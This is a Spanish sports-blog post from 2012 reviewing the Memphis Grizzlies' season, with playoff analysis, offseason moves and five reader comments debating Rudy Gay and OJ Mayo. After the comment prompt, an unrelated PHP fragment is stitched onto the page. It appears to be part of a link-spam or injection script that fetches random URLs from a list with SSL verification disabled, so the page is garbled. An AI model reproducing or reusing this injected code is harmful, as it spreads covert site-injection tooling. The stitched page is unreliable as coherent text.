Memphis Grizzlies: Bien

26 de July de 2012 por txusma

La temporada de los Grizzlies ha sido como la “Shambhala”, la montaña rusa más alta de Europa. Empezamos con unas expectativas moderadas provocadas por la lesión de Darrell Arthur, que dejaba el juego interior en manos exclusivamente de Marc Gasol y Zach Randolph. Igualar el resultado del año pasado con un juego interior tan exiguo parecía una quimera y no se confiaba demasiado en la participación esta temporada de un Rudy Gay del que no todavía no tenemos claro si suma más que resta. De todas maneras, les pedíamos clasificarse para los Playoffs sin problemas. Con 2 All-Stars como Marc Gasol y Zach Randolph, los siempre competitivos Tony Allen y Michael Conley, el expediente-x Rudy Gay y un talentoso OJ Mayo, seguían disponiendo de una de las plantillas más completas y profundas de la competición.

El 1 de Enero de 2012, la cabina de los Grizzlies llego a un triple bucle con tirabuzón invertido. En un partido frente los Bulls, OJ Mayo cae sobre la rodilla derecha de Zach Randolph y la “parte” en pedazos. El héroe de los Playoffs de 2011 se lesionaba para buena parte de la temporada y el ánimo de los aficionados de Memphis caía hasta límites no vistos desde que Kwame Brown vistiera la camiseta de los Grizzlies allá en 2008. Los jugadores, tocados moralmente, empezaron la temporada con 6 derrotas en 9 partidos y negros nubarrones se cernían sobre el proyecto.

Pero el equipo técnico y la directiva querían seguir luchando. En un movimiento relámpago se hicieron con los servicios de Marresse Speights a cambio de Xavier Henry y Lionel Hollins insufló a sus chicos de energía y esperanza y les demostró que a pesar de las adversidades seguían siendo un equipo competitivo. De los 57 partidos que faltaban por jugar, sólo perderían 16 más.

La temporada regular de los Grizzlies ha sido para enmarcar, de doble looping. Han acabado con un balance de 41 victorias y 25 derrotas, empatados con los Lakers en la 3ª posición de la Conferencia Oeste y superando a los Clippers en el sprint final en una lucha cara a cara por la ventaja de campo en la 1ª serie de Playoffs. Como siempre han basado su juego en el concepto de equipo y en la defensa, con Rudy Gay y Michael Conley como estiletes ofensivos y Marc Gasol y Tony Allen como defensivos. El español nos ha dejado una primera parte de la temporada brutal en la que se irguió como el tercer mejor pívot puro de la competición. Fueron tales sus esfuerzos que los entrenadores “tuvieron” que escogerle para el All-Star. Desgraciadamente, el gran esfuerzo que tuvo que hacer le pasó factura en la 2ª parte de la temporada y sobre todo en el mes de abril en el que sus promedios bajaron drásticamente. Es posible que también influyera algo la vuelta de Zach Randolph. El retorno de la gran figura de un equipo es siempre un momento delicado y más si se ha demostrado que sin su participación el equipo ha podido igualar o incluso superar actuaciones previas. En este caso, los pequeños desajustes provocados por la reentrada de Randolph duraron apenas 6 partidos. Tras este tiempo de redescubrimiento, la maquinaria volvió a funcionar a pleno rendimiento, posiblemente mejor aún que antes. Marc Gasol se permitió descansar.

Como ya hemos comentado, Gasol no estuvo solo durante la regular sino que disfrutó de un equipo muy compensado que trabajó a las mil maravillas. El sustituto de Randolph, Marreese Speights, ha tenido una actuación mucho más que digna. Evidentemente, no es Randolph y le falta mucha de la energía y ética de trabajo de Darrell Arthur pero ha demostrado que puede ser un jugador más que válido en el juego interior de un equipo aspirante. Ha salido de titular junto a Gasol buena parte de la temporada y ha cumplido con creces, mucho más de lo esperado. Otro que ha dejado un gran sabor de boca es Michel Conley. El jugador al que muchos criticaban su primer año diciendo que había sido escogido simplemente por ser amigo de Oden, mejora temporada tras temporada y se ha convertido en un base más que solvente. Rudy Gay volvió en plena forma de su lesión con números muy similares a los de sus temporadas anteriores. Ha mejorado bastante en defensa pero en ataque sigue siendo más de lo mismo. ¡Ay si mejorara ese puntito! Finalmente, no podemos olvidarnos de Tony Allen, excelso defensor exterior y auténtico termómetro del equipo. No ha estado tan increíble como hace 2 años pero su participación se antoja fundamental.

Con todos estos ingredientes, más la incorporación a última hora de Gilbert Arenas para intentar conseguir un reserva de garantías para Mike Conley, más una moral por las nubes gracias a un final de regular explosivo, los Grizzlies llegaban a los Playoffs en el punto más alto de su montaña rusa particular. Se consideraban invencibles y algún loco estaba dispuesto a apostar algunos eurillos por su victoria final (37€ pagaban). El rival en primera ronda, unos Clippers que habían visto como los ‘osos’ les adelantaban en el último tramo y que salían como víctimas propiciatorias.

Al final de tercer cuarto del primer cuarto, la montaña rusa se había elevado todavía unos metros. La exhibición que estaba dando Memphis era de las que marcan época y los Clippers no sabían ni de donde le llegaban los golpes. Nada hacía prever lo que iba a pasar en los últimos 12 minutos. En los primeros minutos del último cuarto, la 2ª unidad de los Clippers empezó a anotar con fluidez mientras que a los jugadores de los Grizzlies les entraba una de las mayores carajas que se hayan visto sobre una pista de baloncesto. A falta de 58 segundos para el final, Reggie Evans anotaba para poner por delante a su equipo por primera vez durante todo el partido, tras remontar 21 puntos en el último período. La posterior canasta de Gay no serviría de nada gracias a 2 tiros libres anotados por Chris Paul en los últimos segundos. El tren de los Memphis Grizzlies se precitaba en caída libre por los raíles de la montaña rusa. Imposible recuperarse de algo así.

Pero los Grizzlies mostraron una vez más su fortaleza mental y consiguieron forzar el séptimo partido en su propia casa. La serie había tornado en una serie de partidos feos, trabados, muy trabajados, en los que cada canasta se conseguía tras un esfuerzo titánico. El séptimo no fue diferente pero esta vez la pelota cayó del lado de los Clippers. Chris Paul marcó las diferencias ante un equipo que echó de menos un jugador franquicia como el que había sido Zach Randolph en 2011. Alguien que se pusiera al equipo a la espalda y cogiera la responsabilidad en los momentos importantes de los partidos. Los Grizzlies se despidieron de los Playoffs dejando malas sensaciones y un mal sabor de boca a todos sus aficionados.

Lo mejor: La gran fase regular que protagonizaron a pesar de tener bajas importantes como las de Zach Randolph y Darell Arthur. El gran nivel de Marc Gasol durante la primera parte de la temporada. Michael Conley y Marreese Speights.

Lo peor: La serie frente los Clippers y particularmente ese primer partido. La falta de ‘jugador franquicia’, los Grizzlies darían a Rudy Gay y su mano izquierda por un Carmelo Anthony, por ejemplo. Se confirma que OJ Mayo no va a ser ese jugador rompedor que se esperaba.

Jugando a GM

– No ha habido ningún jugador de calibre a tiro durante este verano pero tampoco está claro que los Grizzlies lo hayan buscado mucho así que vamos a por un modelo continuista. Tampoco podemos aportar ideas porque no serían más que castillos en el aire. Ningún escolta-alero que mejore lo presente ha estado en el mercado. A lo mejor podríamos haber intentado fichar a Deron Williams pero no habría sido nada fácil.

– OJ Mayo abandona la franquicia destino Dallas. No ha dado lo que se esperaba de él y Memphis ha preferido invertir el dinero en otras cosas. Draftearon a Tony Wroten, un jugador del que se comenta que tiene un alto potencial pero que necesita mucho trabajo. Este año no va a aportar ni la mitad de lo que aportaba Mayo en términos de anotación así que los Grizzlies han incoporado también a Wayne Ellington vía trade. Será el ex jugador de los Wolves el que reciba en herencia la mayor parte de los minutos de OJ. No les va a sacar de pobres pero esperan que aporte esa anotación desde más allá de la línea de la que están tan necesitados.

– Parece que han encontrado el base suplente en la figura de Jerryd Bayless. Tras desprenderse de jugadores tan válidos como Kyle Lowry o Greivis Vasquez, los Grizzlies andaban como locos y el ex de los Raptors ha sido escogido. A lo mejor también lo vemos compartir minutos en pistas con Conley dadas sus buenas condiciones anotadoras.

– Han renovado a Darrell Arthur y Marreese Speights para conformar uno de los juegos interiores más potentes de toda la liga, si no el que más.

Comenta

5 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Siempre he pensado que Rudy Gay es un cáncer para este equipo. No hay posibilidad de soltarlo por dos buenos jugadores????

      Citar

  2. Esteban dice:
    #2

    a ver, gay ah jugado unos buenos PO, no es una estrella, pero le pasa cerca, a tomado tiros dificiles sobre el final de los juegos y los ha encestado, ademas de ser el goleador de su equipo, aunque casi siempre en derrotas, no es melo, pero es un muy valido jugador,

    yo hubiese intentado un trade de gay por granger, y los 7 millones de diferencia entre ellos lo hubiese dedicado a la renovacion de o.j. mayo, que se ha mostrado como un sexto hombre de nivel de PO

    ahora no queda mucho por hacer, rezar a que zach vuelva a ser el de 2011, sino estan nuevamente en un callejon sin salida, un trade por el? zach por brook lopez? habria que maquillarlo un poco, perdo a los nets les gusta traer semi estrellas

      Citar

  3. Vader dice:
    #3

    Un Iguolada por Gay tampoco seria mala cosa… Hasta daria alguna ronda a Sixers para que la cosa cuajara.

      Citar

  4. Nacho dice:
    #4

    Yo creo que dos son los puntos flojos de los ositos esta temporada (lesiones aparte):
    . Gay, que como comentas(ais), no termina de ser lo que se espera, al menos en este equipo. Creo que Sancho dijo que sería un espléndido jugador en los Wizards, y creo que acierta. Pero el modelo Grizzlie no le va.
    . El último cuarto del primer partido de PO. Tras esa cagada no volvieron a ser los mismos, tenían DERROTA grabado en sus sienes en toda la serie, aunque llegaran al 7º. Si ganan ese partido creo que arrasan a Clippers, y ahí ahí con Spurs, pero eso es baloncesto ficción. Perdieron cuando no debían, y eso es lo que cuenta.
    Estoy con Vader en lo de Iguodala.¡Qué pedazo defensa montarían! ¡Y espectáculo!

      Citar

  5. RSB dice:
    #5

    ¿Qué Mayo ha demostrado ser un sexto hombre de nivel en PO?

    Dios mío, no puedo estar más y más y más en desacuerdo.

    OJ Malo ha sido un maldito cáncer estas últimas temporadas, pero su exhibición de PO ya ha sido el súmum. Su serie ante los Clippers tirándose las zapatillas como un caballo desbocado sin superar el 30% es de las cosas más lamentables que he visto en unas eliminatorias de esta liga. Nula selección de tiro, perdiendo balones tontos, chupón, no respeta las jerarquías, desastroso a más no poder…

    Es totalmente comprensible que Memphis no haya querido soltar dinero por semejante impresentable. Ellington cumplirá el rol de escolta suplente mucho mejor, es mucho más inteligente y buen tirador, solo necesita confianza. Bayless por fin cubre el agujero negro de la posición del segundo base que tanto daño hizo el año pasado, y Selby además ha estado como una moto en la Summer League.

    Hace 2 años Gay, hace uno Randolph jugando al 50% en PO… ¿Tendrán suerte los osos de una maldita vez este año y habrá salud?

    Respecto al tema Gay, yo no lo tocaría ni loco. No se puede prescindir de él. Vale que es otro cabeza hueca, pero tiene mucho talento, y defendiendo es un top es su posición. Un tío que te mete 18 puntos pp, te desatasca partidos, y te defiende como un especialista… Se le puede perdona que chupe un poco, la verdad.

    Granger es otro lanzapiedras que actualmente no besa ni la suela de los zapatos de Rudy Gay. Un trade es salir perdiendo totalmente.

    Por cierto, tirón de orejas ENORME a Hollins, que dejó que Memphis se convirtiera, ofensivamente, en una casa de putas contra los Clippers. Daba vergüenza ajena ver ataques de 10 segundos y piedrón, 10 segundos y piedrón (así les romontaron y casi los dejan fuera en 5 partidos). Solo cuando se empezaron a respetar las jerarquías, y Marc y Randolph empezaron a recibir y jugarse lo que se tenían que jugar, le entró el miedo en el cuerpo a los Clippers. Conley necesita un poco de diazepam, gracias que no estará Mayo para evolucionarlo aún más.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>